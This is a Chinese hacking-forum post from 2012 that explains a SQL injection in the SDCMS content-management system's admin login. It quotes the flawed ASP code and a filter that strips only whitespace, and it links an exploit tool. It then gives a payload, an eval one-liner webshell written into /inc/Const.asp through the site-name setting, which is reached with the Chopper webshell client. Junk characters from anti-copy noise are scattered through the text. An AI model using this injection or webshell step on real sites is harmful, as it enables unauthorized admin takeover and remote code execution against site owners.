作者:T00LS 鬼哥
@( I/ U0 K8 M* U! z" l0 ~" [漏洞文件:后台目录/index.asp
% }- T# `! A' l+ W
* L- J8 k) O+ M" nSub Check8 e; ]% d9 p$ H" O
Dim username,password,code,getcode,Rs; F) ], F! S( Q) N& Q e* Y
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
4 z" S8 i& l. W g& a0 P: m username=FilterText(Trim(Request.Form("username")),1): J8 `' ~8 X7 w+ k4 G7 C, H9 U
password=FilterText(Trim(Request.Form("password")),1)
4 W( R( k9 C% g: e1 g code=Trim(Request.Form("yzm"))
3 x3 B0 D" G1 {7 Y. K getcode=Session("SDCMSCode")
. J) B6 r5 t, s; c2 T IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died/ J! @8 A+ h9 f1 `3 h( D1 v5 G
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
9 e5 v0 o/ a2 K( l9 x8 \ IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied1 E! h! l3 h4 @
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
% f* ?# z( S0 F IF username="" or password="" Then
1 ], P% d2 A" K# T" V6 E8 l Echo "用户名或密码不能为空"ied1 T6 u" w1 D: y- I- A* Q7 g0 ]
Else( C/ w% X* o |6 @
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
# {9 K) D- Q" r3 \+ K IF Rs.Eof Then( b4 ?# k$ P m) q% u/ ]7 L/ h# h
AddLog username,GetIp,"登录失败",1
2 b C: D$ D* l8 y/ ?# O Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"' L+ C( {% s, K1 q: K& u5 n) o
Else
) q, R C# S1 k% d Add_Cookies "sdcms_id",Rs(0)
# P8 E* C! V' i5 G Add_Cookies "sdcms_name",username
* l% F8 V' Z% G) `3 K0 a$ \ Add_Cookies "sdcms_pwd",Rs(2)8 E; S0 F. ]6 c
Add_Cookies "sdcms_admin",Rs(3)! l) B* k% p) M; d5 Z
Add_Cookies "sdcms_alllever",Rs(4). ]' f3 p l3 i8 q% x8 L3 v
Add_Cookies "sdcms_infolever",Rs(5)- m& H0 m g9 E j5 X
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")0 D3 H/ w9 _2 \$ V- j( c- R
AddLog username,GetIp,"登录成功",1# H3 _8 \. Y" M; Y, {" e8 m
'自动删除30天前的Log记录0 ]- ^1 T- T* `* B8 }
IF Sdcms_DataType Then
' d1 O# d }( L Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")3 u9 K+ U* I6 l8 K- ~ q$ Y
Else3 y' R. d& ^7 l, [+ H3 |& v% e; b
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")- T; z; b2 A8 P; {" w
End IF
2 B7 ~ ]' I( i; V4 e2 ~ Go("sdcms_index.asp"); d' F' b$ c+ @ |# [% v7 B8 I$ u
End IF+ ?; t+ Y* v% d' E- c- _# ^
Rs.Close
5 z8 y9 W0 z. M" O6 a Set Rs=Nothing6 u& e0 c/ r* M% q5 S
End IF8 O3 @5 c* ?2 {$ W
End Sub
, ~1 E3 m! R* d% B0 x8 |
8 @' r" w; V6 i# H4 o’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
9 q- R/ f( u0 E# q* ], A4 Z$ W
) C1 D2 C7 s. I) U) W& n5 V/ l6 m4 mFunction FilterText(ByVal t0,ByVal t1)
" M. C( [/ A: o4 ?) m' s IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
- k# o: n" g4 \5 W' Q& b+ q7 D t0=Trim(t0)
# D6 q' a9 G8 N Q2 ]( \5 A6 R" U Select Case t1
& N6 f9 E0 e( C* G Case "1"
5 N0 w g. E2 \% e" E& T t0=Replace(t0,Chr(32),"")! F' ~2 \) H' u. I& O
t0=Replace(t0,Chr(13),""); W' N# M( _% c" w" U" f0 W+ q
t0=Replace(t0,Chr(10)&Chr(10),"")% V: V/ e" C; i* e
t0=Replace(t0,Chr(10),"")
* o, T9 {' |, W! M6 X& n Case "2"
% W9 S- ~% [5 o7 I8 q/ o t0=Replace(t0,Chr(8),"")'回格. p) }2 ^) ]/ A0 `" ]
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
4 X2 f+ v) Q b t0=Replace(t0,Chr(10),"")'换行0 G5 X0 v4 |1 ~$ \/ l" a% F5 M# T
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)5 o8 O5 p' A. p& l
t0=Replace(t0,Chr(12),"")'换页
( @ E$ N1 q. o t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合2 A) t8 E/ F% q7 X9 m7 h
t0=Replace(t0,Chr(22),"")
- }, Z7 t/ g( d t0=Replace(t0,Chr(32),"")'空格 SPACE- X6 n8 i) F; s! f1 v
t0=Replace(t0,Chr(33),"")'!# i8 y, W- |/ {- m( X
t0=Replace(t0,Chr(34),"")'"
! h) w) R! o' f; W& u t0=Replace(t0,Chr(35),"")'#. x1 ?: E( J9 Y4 V+ q. M0 }) }4 K
t0=Replace(t0,Chr(36),"")'$8 Z. g( {! I! j; h8 r/ B$ x4 f2 P9 T
t0=Replace(t0,Chr(37),"")'%
* r/ r7 d! @/ C9 L t0=Replace(t0,Chr(38),"")'&( }% s3 ?+ j' l3 j4 q& @1 Z7 d' `* S
t0=Replace(t0,Chr(39),"")''
: ^/ ~) i" L% b( X t0=Replace(t0,Chr(40),"")'(
7 v5 w) V7 j' `; }* Q# A t0=Replace(t0,Chr(41),"")')
0 w, s' P2 z7 @, G( t! a! c t0=Replace(t0,Chr(42),"")'*/ n, G- U. O/ V4 [- `0 j2 j
t0=Replace(t0,Chr(43),"")'+
/ `6 k x! e! k) y/ s& W# A t0=Replace(t0,Chr(44),"")',
7 I) L4 B0 [; F- y# D8 s t0=Replace(t0,Chr(45),"")'-* F: C9 E. B( j8 f
t0=Replace(t0,Chr(46),"")'.' ]( }4 U. g0 x
t0=Replace(t0,Chr(47),"")'/3 U- o: G, M3 N/ M
t0=Replace(t0,Chr(58),"")':
+ A! A1 B. Q0 V2 X8 O+ P% F P; X t0=Replace(t0,Chr(59),"")';' B( ^- X) _# V- Z
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>5 u6 }) P6 `, ~4 L, m; _# G8 l) @
t0=Replace(t0,Chr(63),"")'?
- e/ h1 `* E* H5 [0 V8 d t0=Replace(t0,Chr(64),"")'@5 ?; g: a: _& O
t0=Replace(t0,Chr(91),"")'\
) n; P D" F, y A5 F/ b t0=Replace(t0,Chr(92),"")'\& D5 N8 G: s+ V+ N! W3 h' j
t0=Replace(t0,Chr(93),"")']5 E9 `' S; |+ E
t0=Replace(t0,Chr(94),"")'^4 L' W- X; A! d! b4 F* m2 q% Q: E& X
t0=Replace(t0,Chr(95),"")'_- A! q' s: t5 ^, B) r
t0=Replace(t0,Chr(96),"")'`, N# A- [9 h2 {" {! {
t0=Replace(t0,Chr(123),"")'{( _6 W2 C; H2 E$ A9 f' ?
t0=Replace(t0,Chr(124),"")'|; R) q8 P B" A2 o$ X
t0=Replace(t0,Chr(125),"")'}
+ s8 p" {( Z5 \8 Y8 D r' E% v t0=Replace(t0,Chr(126),"")'~" G- e7 U \0 e% j4 I8 m
Case Else
, p S% j6 L( m7 P( H: ~ t0=Replace(t0, "&", "&"), }1 G+ x9 ]0 ~' m
t0=Replace(t0, "'", "'")+ ]6 ]. e! i3 @
t0=Replace(t0, """", """)+ B: `! _& _% W0 k4 Y
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
; t& t: z! ^8 P0 A( k/ k End Select2 ]1 u" J: V8 M# N
IF Instr(Lcase(t0),"expression")>0 Then) q/ o h" v2 i! g' q" X5 d
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
4 l5 y+ R' \; e End If& s. }0 D- V! [* d- c2 s, @
FilterText=t0
) |* T7 J; O3 z; H GEnd Function
: k2 A6 i4 j' ?) d$ Q+ O. k+ ~! j2 W" h
看到没。直接参数是1 只过滤% M! l( ?# ^; N
t0=Replace(t0,Chr(32)," ")- B9 z7 A" c& D' H9 X
t0=Replace(t0,Chr(13),"")3 ?5 X2 T4 Y" Z; C+ s. {! }6 V
t0=Replace(t0,Chr(10)&Chr(10),"* o( X5 [6 D7 A
")- I$ Q2 J/ K3 V( I- e
t0=Replace(t0,Chr(10),"
" d# A# E6 D7 j2 W! k")
5 l7 v0 z U% N1 q3 P5 c# t% k漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
9 M+ o: y+ b( R" \EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
' u$ \+ t1 y0 C+ G5 Z& J4 }8 l$ K2 B; K; D) a
测试:
$ y- T, D# Y, H( s% B
' u+ e+ S( Y" h. J F5 Q
" F3 X; T" H! c- H- W- Q现在输入工具上验证码,然后点OK
3 ^5 u1 E" r0 Y @% W+ w" E0 D' Z9 k% O* ]+ t% M
4 Q' V) j- T/ D1 [* s
看到我们直接进入后台管理界面了,呵呵!* f3 E. w" W/ L" M
; d) ?, u1 x3 |4 c, v9 X7 L
( L: z* D2 U! b# H2 S/ d7 G* p3 `( G; L: E: b
这样直接进入后台了。。。。8 |/ ^! w9 x" G6 x# _5 f
. Y- n3 c# i4 e- Z( T2 t4 f* k& ~
W$ _& G; F, P% }6 [0 f5 V+ O3 _2 w3 `0 A/ ~* H8 E
SDCMS提权:
/ g+ v& Y2 c) z1 j6 g
) b: i) O2 E/ |/ i1 H8 S4 [方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?$ y( Q; J, V+ {
) g2 s& T) T4 Q- O' ?- B
% G- s) R1 h4 T/ I6 y, R" b1 g H
OK,现在用菜刀连接下!
- [ D9 t& j" U9 o0 d$ p/ X) b
& }; h- ~8 `6 r* U5 l9 A& w' a2 Q
Z* Z: e5 O' P5 M
k, F# K5 [9 k) F' P, W
) B# ?. G' q. u- b |
发表于 2012-11-9 20:57:02
收藏
支持
反对